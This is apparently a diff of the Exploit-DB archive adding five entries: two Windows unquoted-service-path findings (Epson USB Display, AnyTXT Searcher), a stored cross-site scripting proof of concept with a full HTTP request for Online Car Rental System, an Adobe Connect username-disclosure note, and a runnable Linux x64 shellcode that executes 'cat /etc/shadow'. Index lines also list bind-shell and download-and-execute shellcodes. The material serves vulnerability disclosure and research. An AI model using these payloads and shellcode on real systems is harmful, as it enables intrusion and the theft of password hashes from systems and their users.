DB: 2021-02-10

5 changes to exploits/shellcodes

Epson USB Display 1.6.0.0 - 'EMP_UDSA' Unquote Service Path
AnyTXT Searcher 1.2.394 - 'ATService' Unquoted Service Path
Online Car Rental System 1.0 - Stored Cross Site Scripting
Adobe Connect 10 - Username Disclosure

Linux/x64 - execve _cat /etc/shadow_ Shellcode (66 bytes)

exploits/multiple/webapps/49550.txt

@@ -0,0 +1,18 @@
+# Title: Adobe Connect 10 - Username Disclosure
+# Author: h4shur
+# date:2021-02-07
+# Vendor Homepage: https://www.adobe.com
+# Software Link: https://www.adobe.com/products/adobeconnect.html
+# Version:  10 and earlier
+# Tested on: Windows 10 & Google Chrome
+# Category : Web Application Bugs
+
+### Description :
+
+By adding this (/system/help/support) to the end of the desired website address, you can view the username without any filter or obstacle. Sometimes even without a username and password. And by adding (/system/login) to the end of the desired website address, you can access the admin panel without any filters.
+
+### POC :
+site.com/system/help/support
+
+### Admin Panel :
+site.com/system/login

exploits/php/webapps/49546.txt

@@ -0,0 +1,98 @@
+# Exploit Title: Online Car Rental System 1.0 - Stored Cross Site Scripting
+# Date: 9/2/2021
+# Exploit Author: Naved Shaikh
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/cc/14145/online-car-rental-system-using-phpmysql.html
+# Version:  V 1.0
+# Tested on Windows 10, XAMPP
+
+Steps:
+1) Open http://localhost/car-rental/admin/post-avehical.php 
+
+2) Fill All the details on the page. After submitting, capture the request and change the "vehicalorcview" parameter with our Payload "<script>alert("CAR")</script>" and submit
+
+3) Open the http://localhost/car-rental/ and our Payload excuted.
+
+Request
+POST /car-rental/admin/post-avehical.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------13786099262839578593645594965
+Content-Length: 2724377
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/car-rental/admin/post-avehical.php
+Cookie: PHPSESSID=h5ubatunno8u9130c4eq77anf2
+Upgrade-Insecure-Requests: 1
+
+-----------------------------13786099262839578593645594965
+Content-Disposition: form-data; name="vehicletitle"
+
+TestName
+-----------------------------13786099262839578593645594965
+Content-Disposition: form-data; name="brandname"
+
+2
+-----------------------------13786099262839578593645594965
+Content-Disposition: form-data; name="vehicalorcview"
+
+<script>alert("CAR")</script>
+-----------------------------13786099262839578593645594965
+Content-Disposition: form-data; name="priceperday"
+
+200
+-----------------------------13786099262839578593645594965
+Content-Disposition: form-data; name="fueltype"
+
+Diesel
+-----------------------------13786099262839578593645594965
+Content-Disposition: form-data; name="modelyear"
+
+2008
+-----------------------------13786099262839578593645594965
+Content-Disposition: form-data; name="seatingcapacity"
+
+22
+-----------------------------13786099262839578593645594965
+Content-Disposition: form-data; name="img1"; filename="Untitled.png"
+Content-Type: image/png
+
+‰PNG
+
+-----------------------------13786099262839578593645594965
+Content-Disposition: form-data; name="img5"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------13786099262839578593645594965
+Content-Disposition: form-data; name="powerdoorlocks"
+
+1
+-----------------------------13786099262839578593645594965
+Content-Disposition: form-data; name="antilockbrakingsys"
+
+1
+-----------------------------13786099262839578593645594965
+Content-Disposition: form-data; name="driverairbag"
+
+1
+-----------------------------13786099262839578593645594965
+Content-Disposition: form-data; name="passengerairbag"
+
+1
+-----------------------------13786099262839578593645594965
+Content-Disposition: form-data; name="centrallocking"
+
+1
+-----------------------------13786099262839578593645594965
+Content-Disposition: form-data; name="crashcensor"
+
+1
+-----------------------------13786099262839578593645594965
+Content-Disposition: form-data; name="submit"
+
+
+-----------------------------13786099262839578593645594965--

exploits/windows/local/49548.txt

@@ -0,0 +1,28 @@
+# Exploit Title: Epson USB Display 1.6.0.0 - 'EMP_UDSA' Unquote Service Path
+# Discovery by: Hector Gerbacio
+# Discovery Date: 2021-02-05
+# Vendor Homepage: https://epson.com.mx/
+# Tested Version: 1.6.0.0
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 8.1 con Bing
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\WINDOWS\\" | findstr /i "EMP_UDSA" | findstr /i /v """
+EMP_UDSA		EMP_UDSA		C:\Program Files (x86)\EPSON Projector\Epson USB Display V1.6\EMP_UDSA.exe			Auto
+
+# Service info:
+
+C:\>sc qc EMP_UDSA
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: EMP_UDSA
+        TIPO               : 110  WIN32_OWN_PROCESS (interactive)
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\EPSON Projector\Epson USB Display V1.6\EMP_UDSA.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : EMP_UDSA
+        DEPENDENCIAS       : RPCSS
+        NOMBRE_INICIO_SERVICIO: LocalSystem

exploits/windows/local/49549.txt

@@ -0,0 +1,25 @@
+# Exploit Title: AnyTXT Searcher 1.2.394 - 'ATService' Unquoted Service Path
+# Date: 2020-12-11
+# Exploit Author: Mohammed Alshehri
+# Vendor Homepage: Anytxt.net
+# Software Link: https://sourceforge.net/projects/anytxt/files/AnyTXT.Searcher.1.2.394.exe
+# Version: Version 1.2.394
+# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
+
+
+# Service info:
+C:\Users\m507>sc qc ATService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: ATService
+        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
+        START_TYPE         : 2   AUTO_START  (DELAYED)
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\AnyTXT Searcher\atservice.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : AnyTXT Searcher Indexing Service
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+C:\Users\m507>

files_exploits.csv

@@ -11259,6 +11259,8 @@ id,file,description,date,author,type,platform,port
 49530,exploits/windows/local/49530.txt,"Millewin 13.39.146.1 - Local Privilege Escalation",2021-02-08,"Andrea Intilangelo",local,windows,
 49535,exploits/windows/local/49535.txt,"AMD Fuel Service - 'Fuel.service' Unquote Service Path",2021-02-08,"Hector Gerbacio",local,windows,
 49541,exploits/windows/local/49541.html,"Microsoft Internet Explorer 11 32-bit - Use-After-Free",2021-02-08,"Forrest Orr",local,windows,
+49548,exploits/windows/local/49548.txt,"Epson USB Display 1.6.0.0 - 'EMP_UDSA' Unquote Service Path",2021-02-09,"Hector Gerbacio",local,windows,
+49549,exploits/windows/local/49549.txt,"AnyTXT Searcher 1.2.394 - 'ATService' Unquoted Service Path",2021-02-09,"Mohammed Alshehri",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -43736,3 +43738,5 @@ id,file,description,date,author,type,platform,port
 49543,exploits/php/webapps/49543.txt,"WordPress Plugin Supsystic Data Tables Generator 1.9.96 - Multiple Vulnerabilities",2021-02-08,"Erik David Martin",webapps,php,
 49544,exploits/php/webapps/49544.txt,"WordPress Plugin Supsystic Contact Form 1.7.5 - Multiple Vulnerabilities",2021-02-08,"Erik David Martin",webapps,php,
 49545,exploits/php/webapps/49545.txt,"WordPress Plugin Supsystic Backup 2.3.9 - Local File Inclusion",2021-02-08,"Erik David Martin",webapps,php,
+49546,exploits/php/webapps/49546.txt,"Online Car Rental System 1.0 - Stored Cross Site Scripting",2021-02-09,"Naved Shaikh",webapps,php,
+49550,exploits/multiple/webapps/49550.txt,"Adobe Connect 10 - Username Disclosure",2021-02-09,h4shur,webapps,multiple,

files_shellcodes.csv

@@ -1030,3 +1030,4 @@ id,file,description,date,author,type,platform
 49416,shellcodes/linux/49416.txt,"Linux/x86 - Bind (0.0.0.0:13377/TCP) Shell (/bin/sh) Shellcode (65 bytes)",2021-01-12,ac3,shellcode,linux
 49466,shellcodes/windows_x86/49466.asm,"Windows/x86 - Download File (http://10.10.10.5:8080/2NWyfQ9T.hta) Via mshta + Execute + Stager Shellcode (143 bytes)",2021-01-22,"Armando Huesca Prida",shellcode,windows_x86
 49472,shellcodes/linux/49472.c,"Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes)",2021-01-25,"Guillem Alminyana",shellcode,linux
+49547,shellcodes/linux_x86-64/49547.c,"Linux/x64 - execve _cat /etc/shadow_ Shellcode (66 bytes)",2021-02-09,"Felipe Winsnes",shellcode,linux_x86-64

shellcodes/linux_x86-64/49547.c

@@ -0,0 +1,63 @@
+# Exploit Title: Linux/x64 - execve "cat /etc/shadow" Shellcode (66 bytes)
+# Date: 02-08-2021
+# Author: Felipe Winsnes
+# Tested on: Debian x64
+# Shellcode Length: 66
+
+/*
+global _start
+
+_start:
+
+       xor rax, rax                   ; Zeroes out RAX.
+       xor rbp, rbp                   ; Zeroes out RBP.
+
+       push rax                       ; Pushes RAX's NULL-DWORD.
+
+       mov rbp, 0x776f646168732f63    ; Moves value "wodahs/c" into RBP.
+       push rbp                       ; Pushes the vaueof RBP into the Stack.
+
+       mov rbp, 0x74652f2f2f2f2f2f    ; Moves value "te//////" into RBP.
+       push rbp                       ; Pushes the vaue of RBP into the Stack.
+
+       mov rbp, rsp                   ; Copies the value of the Stack into RBP.
+       push rax                       ; Pushes RAX's NULL-DWORD.
+
+       mov rbx, 0x7461632f6e69622f    ; Moves value "tac/nib/" into RBX.
+       push rbx                       ; Pushes the vaue of RBX into the Stack.
+
+       mov rbx, rsp                   ; Copies the value of the Stack into RBX.
+
+       mov rdi, rsp                   ; Copies the value of the Stack into RDI.
+       push rax                       ; Pushes RAX's NULL-DWORD.
+
+       mov rdx, rsp                   ; Copies the value of the Stack into RDX. As the previous DWORD was completely NULL, RDX is set to 0.
+
+       push rbp                       ; Pushes the vaue of RBP into the Stack.
+       push rbx                       ; Pushes the vaue of RBX into the Stack. The full string should be "cat /etc/shadow".
+
+       mov rsi, rsp                   ; Copies this entire string from the Stack into RSI.
+
+       push word 59                   ; Pushes the value 59 (syscall value for execve in the x64 format).
+       pop ax                         ; Pops this value into AX so there are no NULLs.
+       syscall                        ; The syscall is executed.
+*/
+
+
+/*
+Usage:
+whitecr0wz@SLAE64:~/assembly/execve/cat$ gcc cat_shadow.c -o cat_shadow -fno-stack-protector -z execstack -w
+whitecr0wz@SLAE64:~/assembly/execve/cat$ ./cat_shadow
+*/
+
+#include <stdio.h>
+
+unsigned char shellcode[] = \
+"\x48\x31\xc0\x48\x31\xed\x50\x48\xbd\x63\x2f\x73\x68\x61\x64\x6f\x77\x55\x48\xbd\x2f\x2f\x2f\x2f\x2f\x2f\x65\x74\x55\x48\x89\xe5\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x63\x61\x74\x53\x48\x89\xe3\x48\x89\xe7\x50\x48\x89\xe2\x55\x53\x48\x89\xe6\x66\x6a\x3b\x66\x58\x0f\x05";
+
+int main()
+{
+
+    int (*ret)() = (int(*)())shellcode;
+    ret();
+}